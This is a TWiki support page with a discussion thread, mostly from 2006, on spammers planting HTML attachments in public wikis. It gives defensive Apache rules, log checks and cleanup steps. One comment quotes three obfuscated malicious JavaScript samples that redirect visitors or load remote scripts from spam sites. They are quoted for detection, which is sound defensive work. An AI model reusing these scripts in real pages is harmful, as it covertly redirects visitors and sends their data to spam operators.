HTML Attachment Spam - Beware of New Type of Spam
NOTE: |
All administrators of public TWiki sites are encouraged to upgrade to the latest BlackListPlugin, version 2013-03-22. It prevents known wiki-spam from getting saved in TWiki topics and uploaded as HTML attachments, makes scripted registrations harder, and protects the site from excessive use by an IP address. It also protects TWikis from topics text and attachments with evil script eval() and escape(). |
Recently a new type of spam has been seen that can have very negative consequences for TWiki site owners.
Traditionally spammers have added links to their porn/medicin/whatever websites in the effort of getting a higher Google ranking.
Naturally this meant that their URLs quickly got blacklisted everywhere.
Now they use our TWiki's as webservers.
What they have done until now is register as a regular user editing only their own user topic.
What they do is they add a number of attachments to the user page. The attachments are all
HTML pages that your Apache will serve quite normally without activating TWiki because they are served right out of the pub directory.
After they have planted their files they start adding links directly to these html files from misc other wikis, blogs, guestbooks, forums etc. And YOUR site ends up with a high Google score when searching for various product names.
And soon YOUR IP address and domain name will be on the common blacklists. If your TWiki is important to you and/or your business you should be concerned about this fact.
The first thing you should do when you read this is look for a user called NeoVertigo. He has spammed quite many TWikis the past days.
The 2nd thing is to look in the pub/Main directory and check out your users attachments. Look for .htm or .html files.
If you find something my experience is that the spammer has invested quite a lot of energy getting his pub directory high on the Google score. So he will keep on re-registering and add his junk again and again. A spammer has been seen re-registered 4 times during 3 hours on the same site. It is not enough to delete his user account. You need to make it useless and prevent re-registration.
- Empty his homepage for any content.
- Delete the ,v file so there is no history. Delete the pub directory that belongs to his account.
- Put either a
* Set ALLOWTOPICCHANGE = Main.TwikiAdminGroup
in his topic
- Or if possible change the ownership of both topic and directory under pub to have root as owner and chmod them to 400. This way the spammer will get nothing but errors.
- Finally change his entry in .htpasswd to some illegal password and important: change the email address in .htpasswd to your own email address if you run TWiki4.
How can we prevent him from making a new account and start all over? We cannot. But we can annoy them.
In your httpd.conf you can add this
RedirectMatch .*pub/Main.*\.htm.*$ http://yourdomain.com/nospam.htm
Rewritecond %{QUERY_STRING} ^.*htm.*$
RewriteRule ^bin/viewfile/Main.* http://yourdomain.com/nospam.htm
and put a nice message for both spammer and other visitors on the page.
What this line does is it prevents anyone from seeing .htm or .html files from any users pub directory.
If you never attach html files to any topic you can use this
RedirectMatch .*pub/.*\.htm.*$ http://yourdomain.com/nospam.htm
Rewritecond %{QUERY_STRING} ^.*htm.*$
RewriteRule ^bin/viewfile/.* http://yourdomain.com/nospam.htm
In TWiki4 you can make uploading of .htm and .html named files by forcing TWiki to append a .txt to the file name. This does not prevent people from seeing the spam file but it is now shown as raw
HTML and not at all very interesting to anyone. This filter will work in all webs and will prevent also the good guys from uploading html files in the pub directories. But it is rare that anyone really needs that.
It has been suggested to add htm|html to the $TWiki::cfg{UploadFilter} but this is of little use because the most popular browser Internet Explorer does not give a damm and shows the contents as a webpage anyway.
Here is a command you can run in your twiki/data directory to check for recent uploads of files ending with .htm
egrep ' upload .*\.htm' log202401.txt
Here is an improved command you can put into an "ths" alias (mnemonic "type html spam") for easy access:
alias ths='egrep " upload .*\.htm" log`date +%Y%m`.txt |
sed "s/upload . \([^\.]*\)\.\([^ ]*\) . /http:\/\twiki.org\/p\/pub\/\1\/\2\//" | tail -20'
This is twiki.org specific; it produces a complete URL for copy & paste, such as:
The next move the spammers make is using the Trash web. So they upload first and then move it to the trash. So it is wise to block access to viewing any files from the pub dir in the trash web.
This is done with this in the apache config file (example)
<Directory "/var/www/twiki/pub/Trash">
deny from all
</Directory>
We hope people will come up with more and maybe better counter measures. Take this one seriously since you do not want your IP or domain to end up blacklisted.
--
Contributors: KennethLavrsen,
PeterThoeny
Discussion
The
BlackListPlugin should be enhanced to check also uploaded html files.
--
PeterThoeny - 26 May 2006
Since Internet Explorer shows .txt files with html inside as web pages it make little point to add the htm|html to the upload filter. So I removed it again from above.
--
KennethLavrsen - 26 May 2006
Just had the first case here on twiki.org. Someone registering as
NewGood and attaching 6 spam html pages to the user homepage. Removed the account, trashed attachments, set attachment directory to read only.
--
PeterThoeny - 27 May 2006
A new version of the
BlackListPlugin is available in TWiki 4 branch of
SVN that scans for
HTML attachment spam. I will release it in the next few days (after investigating an issue with the beforeAttachmentSaveHandler on Solaris,
Bugs:Item2390, which breaks file uploads.) Please help test the Plugin.
--
PeterThoeny - 01 Jun 2006
Wiki spam isn't a new problem, of course, but as spammers and scammers get more desperate they are likely to more actively pursue new ways of conducting their "business". So it's very good that you've enhanced the
BlackListPlugin to try to deal with this. Unfortunately, this is likely to be a continuing battle, as those of us who have fought the on the email spam front have discovered, and the very nature of wikis make it especially hard to combat.
--
MeredithLesly - 03 Jun 2006
As long as spammers are successful in their marketing (I start to think the criteria for this is that just
one person actually buys their stuff ..) this will continue. Problem is only basically solved when people will choose to do something else than react on the spam :-/.
But as this is not going to happen any time soon, let's continue the "fight"
If we look at spam sent over the SMTP protocol at the moment, most of it (75%, based on a quick review of my own share, ~90 mails/day) are sent as attachments (jpgs). That means traditional regex-based filters are ruled out, and the same is going to happen to twiki spamming.
For now the spammers are appearing to work html-based with regards to twiki (because they are experimenting with search engine ratings), but as soon as
BlackListPlugin and other automatic measures are effective against this html-/text-based-kind, we will start to see a jpg/image/ppt/pdf/choose-your-binary-format/-based kind of spam instead.
Trying to automate this thorugh OCR and other technical initiatives is a way to go - but at the same time trying to have your community focused on this problem is a better and simpler approach in my view.
One thing we could consider while waiting: As google will automatically interpret many binary formats, a regular google check on your site is one of the easy things you can schedule regularly (i.e. a simple search like
http://www.google.com/search?q=%2Bviagra+%2Binurl:twiki (add +site:mysite.com parm)). Unforunately leaveraging this through i.e. blacklistplugin is quite a job (remove content, trace/remove content contributor account, ban ip-address range or similar); community effort can apply more IQ up front and are readily available
Btw: If you explore some of the links from the search, you will notice much of the spam is not actually displayed to a visiting user, but just hidden in the source (typically using
style=display:none
). So we need to be aware that often the purpose of this kind of spam is another than just displaying links to the user (higher ratings/more referrers is just as important).
--
SteffenPoulsen - 04 Jun 2006
Yet another twist has emerged: E-mail spam pointing to
HTML attachment spam that immediately redirects to a spam site (in order to earn clicks.) To complicate matters, the redirect is obfuscated
with
JavaScript. So far I identified three different approaches of obfuscating the spam site URL. Exmples:
Case 1, in
HTML body:
<SCRIPT language=JavaScript>
<!--
function
otqzyu(nemz){fak="lo";sqg5="catio";hez8="n.r";vj20=2;mek13="eplac";rgi18="e";vbb25="('";awq27="";so26=4;asfww="'ht";awg44ag="tp:/";wqeno3="/www.bestgamblecasino";qemowr=".com/";wefgnm="a01";qegmik="68/";qwtqqqqq="main/";thktk="00/'";dh4=eval(asfww+awg44ag+wqeno3+qemowr+wefgnm+qegmik+qwtqqqqq+thktk);je15="')";if
(vj20+so26==6) eval(fak+sqg5+hez8+mek13+rgi18+vbb25+awq27+dh4+je15);}
otqzyu();//-->
</SCRIPT>
Case 2, in
HTML body:
<script>var t='<span id="sp" sty'+'le="dis'+'play:n'+'one"><h'+'1>404
Not Found'+'</'+'h1><span
sty'+'le="dis'+'play:n'+'one">';document.write(t);var
ref=escape(document.referrer); var s="<scr"+"ipt
src='ht"+"tp://chea"+"pest-pharmacy.u"+"s/c.js?q=cialis&ref="+ref+"'><\/sc"+"ript>";document.write(s);</script>
Case 3, between
HTML head and body:
<script src='x.js' type='text/javascript'>
And with this content in the x.js file:
eval(unescape("x%3D195%3B%0D%0Ay%3Dx%2D1%3B%0D%0Aif%28x%21%3Dy%29%20document%2Elocation%3D%22http%3A%2F%2Fwww%2Epharmacyvip%2Ecom%2Fpbm/xanax/xanax.htm%22%3B%0D%0A"));
The latest
BlackListPlugin does not yet protect against obfuscated URL, until then I suggest site operators to monitor
HTML attachments daily.
--
PeterThoeny - 09 Jun 2006
It's also important to make sure that
WIKIWEBMASTER
is set in Main.!TWikiPreferences, so that you will receive notifications of new registrations. Many public sites have the notices going to
webmaster@example.com
.
--
MeredithLesly - 09 Jun 2006
After adding the
RedirectMatch
line to my
.htaccess
file, I noticed that
HTML files were still accessible via the
viewfile
script. I've added the following lines to the recommendations above. They seem to work well for my site, but I would be grateful if someone else could try them too.
Rewritecond %{QUERY_STRING} ^.*htm.*$
RewriteRule ^bin/viewfile/.* http://yourdomain.com/nospam.htm
--
AndyPryke - 25 Jun 2006
The
evil spammers (
) have placed 100's if not thousands of links to their spam which was placed on my website. I get a great number of hit on these pages.
In order to discourage the spammers, I think it makes sense to try and undermine their business model. If they spend the effort to create these links, but their potential "customers" or victims are put off, then their attempts at spamming have a negative effect on their profits. I think that this is the ultimate disincentive.
I have redirected the spam pages to a message which says
This page of spam advertising has been removed.
It was not placed on this website by the website owner.
If you try and buy drugs from spammers they will steal your credit card details.
You're also very unlikely to receive any pills, and if you do they will probably be complete fakes or dangerous
If you do feel that you need to obtain medicines, please see a qualified doctor who can advise you about their suitability and side effects.
You can see the page here:
http://www.the-data-mine.com/spam_message.html
I'd recommend that other TWiki admins do the same, as I believe it will have a genuine effect against the spammers.
Any comments?
--
AndyPryke - 03 Jul 2006
Doesn't work. Doesn't cost them money. Just keeps eating your bandwidth.
--
MeredithLesly - 03 Jul 2006
It helps if humans click on the link. The spammers spam wiki sites mainly with the hope that search engines index it and raise the ranking because many sites pointing to their spam.
Andy, in order to reduce spam on your site it is better to remove all spam as quickly as possible. Spammers search for "viagra" and other spam words to find easy targets.
Update your robots.txt file and ask Google to update the cache of your site,
http://www.google.com/support/webmasters/bin/topic.py?topic=8459
--
PeterThoeny - 03 Jul 2006
Updating the robots.txt to block indexing of the "pub" directory makes sense - I'll do this.
You're right that the spammers who place links in TWiki pages are doing this to increase their search ranking.
However, the spammers who add
HTML as an attachment have a different tactic. This is evidenced by their (massive but presumably scripted) efforts to provide links to the pages they have uploaded. For example,
google reports 21,000 links to the pages they uploaded to my site, though if you click through the google listings, they stop at about page 98 or so. I get a few hundred click-throughs a day at the moment.
Each of those 21k (or 980) links is competing for people who will click on dodgy dr_gs links. The people who click through are mostly "warm leads". If TWiki sites get a reputation for (i) quickly removing
HTML spam and (ii) putting off those warm leads, then spammers will go elsewhere - they're in this to make money, not to cause us problems (it's just that they don't mind causing us problems).
In terms of bandwidth, the impact of a simple text page is negligible.
By the way, I also got an email from
NewGood saying that they were having problems changing their password! I did respond but their inbox was full.
--
AndyPryke - 04 Jul 2006 (either forgot to add last time or it got deleted by accident)
AllI can only relate from many years of experience in fighting email spam (and blocking it from my clients) is that spammers adapt faster than we ever can. The
only thing that's changed at all is that a few ISPs that used to be willing to host spammers don't any more. The result? Spammers created viruses that turn Windows machines into spamming machines, either sending out mail or hosting sites (primarily the former). I venture to say 90% of the spam that is sent to my clients comes from infected machines. This is, btw, why blocking IP numbers doesn't work and in fact has a negative effect: the IP numbers belong to innocent people who don't know that they're infected who might be interested in a wiki site and will wind up being blocked from registering through no fault of their own (other than running an infected machine, of course).
If you (or anyone else who is concerned with this problem) want to learn more about fighting spammers, read the various news.admin.net-abuse.* news groups. This battle has been going on for a long long time, with sadly few positive effects.
--
MeredithLesly - 04 Jul 2006
I don't agree that blacklisting IPs of zombified Windows machines is a bad idea - the owners of such machines need to learn how to keep their machine secure through auto-updates, anti-virus/spyware scanning, etc, so it is a good thing if a lot of sites start to block them. Then, maybe they'll call their ISP who will diagnose that their PC's been zombified and help them clean it up. Of course, this will only work if the blacklist address list is very widely used and they visit a blog/wiki that uses it.
--
RichardDonkin - 05 Jul 2006